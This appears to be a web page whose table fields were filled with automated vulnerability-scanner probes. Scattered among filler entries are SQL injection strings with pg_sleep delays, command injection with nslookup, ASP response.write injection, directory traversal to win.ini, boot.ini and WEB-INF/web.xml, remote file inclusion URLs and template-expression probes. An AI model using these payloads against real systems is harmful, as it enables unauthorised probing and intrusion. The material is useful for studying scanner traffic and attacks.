|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
response.write(9486310*9263904) |
|
|
|
|
|
"+response.write(9486310*9263904)+" |
|
|
|
|
|
response.write(9029053*9235096) |
|
|
|
|
|
"+response.write(9029053*9235096)+" |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
41vLASJW |
|
|
|
|
|
1 |
|
|
|
|
|
set|set&set |
|
|
|
|
|
j5V94vV6 |
|
|
|
|
|
$(nslookup fpd0d085) |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
GJN2Hvp2 |
|
|
|
|
|
1 |
|
|
|
|
|
set|set&set |
|
|
|
|
|
-1 OR 2+388-388-1=0+0+0+1 -- |
|
|
|
|
|
1 |
|
|
|
|
|
$(nslookup BXTGacCC) |
|
|
|
|
|
-1 OR 2+986-986-1=0+0+0+1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
$(nslookup FZBLAUm8)
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
-1" OR 2+863-863-1=0+0+0+1 -- |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
$(nslookup uNaXohyO)
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
-1;select pg_sleep(6); -- |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
-1);select pg_sleep(9); -- |
|
|
|
|
|
1 |
|
|
|
|
|
-1));select pg_sleep(9); -- |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
../../../../../../../../../../windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
../../../../../../../../../../boot.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
FJ2vNbT5 |
|
|
|
|
|
../../../../../../../../../../windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
-1 OR 2+488-488-1=0+0+0+1 -- |
|
|
|
|
|
À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯windowsÀ¯win.ini |
|
|
|
|
|
-1 OR 2+553-553-1=0+0+0+1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
................windowswin.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
..\..\..\..\..\..\..\..\windows\win.ini |
|
|
|
|
|
|
|
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
-1" OR 2+217-217-1=0+0+0+1 -- |
|
|
|
|
|
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini |
|
|
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
|
|
1 |
|
|
|
|
|
WEB-INF/web.xml |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
WEB-INF\web.xml |
|
|
|
|
|
|
|
1 |
|
|
|
|
|
../../../../../../../../../../windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
../../../../../../../../../../boot.ini |
|
|
|
|
|
-1;select pg_sleep(12); -- |
|
|
|
|
|
1 |
|
|
|
|
|
-1);select pg_sleep(4); -- |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
${9999384+9999197} |
|
|
|
|
|
-1));select pg_sleep(4); -- |
|
|
|
|
|
1 |
|
|
|
|
|
${10000414+9999333} |
|
|
|
|
|
../../../../../../../../../../windows/win.ini |
|
|
|
|
|
1 |
|
|
|
${9999183+10000288}
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯windowsÀ¯win.ini |
|
|
|
${10000242+9999489}
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
................windowswin.ini |
|
|
|
|
|
1 |
|
|
|
|
|
..\..\..\..\..\..\..\..\windows\win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
WEB-INF/web.xml |
|
|
|
|
|
1 |
|
|
|
|
|
WEB-INF\web.xml |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg |
|
|
|
|
|
1 |
|
|
|
|
|
1some_inexistent_file_with_long_name |
|
|
|
|
|
1 |
|
|
|
|
|
Http://testasp.vulnweb.com/t/fit.txt |
|
|
|
|
|
1 |
|
|
|
|
|
http://testasp.vulnweb.com/t/fit.txt?.jpg |
|
|
|
|
|
1 |
|
|
|
|
|
testasp.vulnweb.com |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1some_inexistent_file_with_long_name |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
Http://testasp.vulnweb.com/t/fit.txt |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
http://testasp.vulnweb.com/t/fit.txt?.jpg |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
testasp.vulnweb.com |
|
|
|
|
|
1 |
|
|
|
WEB-INF/web.xml
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
WEB-INF\web.xml
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
testasp.vulnweb.com
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
testasp.vulnweb.com
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
WEB-INF/web.xml
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1&n997697=v946307 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
WEB-INF\web.xml
|
[17-12-03] |
 |
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
) |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
!(()&&!|*|*| |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
^(#$!@#$)(()))****** |
|
|
|
|
|
1 |
|
|
|
|
|
) |
|
|
|
|
|
1 |
|
|
|
|
|
!(()&&!|*|*| |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
|
|
1 |
|
|
|
xodxphqc
| | |